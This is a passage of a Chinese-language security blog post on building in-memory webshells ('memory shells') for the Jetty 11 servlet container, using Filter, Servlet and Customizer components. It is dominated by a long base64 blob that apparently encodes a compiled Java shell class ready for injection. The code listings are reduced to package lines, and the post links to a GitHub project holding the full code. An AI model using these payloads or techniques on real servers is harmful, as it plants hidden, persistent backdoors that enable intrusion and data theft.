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 |
Jetty11 内存马
其实是一模一样的
Filter
1 | package com.boogipop.memshell; |
只不过包名有点改变,然后有些类消失了,比如sun.misc.base64这个类
FilterTemplates
1 | package com.boogipop.memshell; |
Servlet
1 | package com.boogipop.memshell; |
1 | package com.boogipop.memshell; |
Customizer内存马
1 | package com.boogipop.memshell; |
该内存马类似于filter内存马,也就是tomcat的value内存马。
有关代码
有关代码已上传github
https://github.com/Boogipop/JettyMemshellProject
About this Post
This post is written by Boogipop, licensed under CC BY-NC 4.0.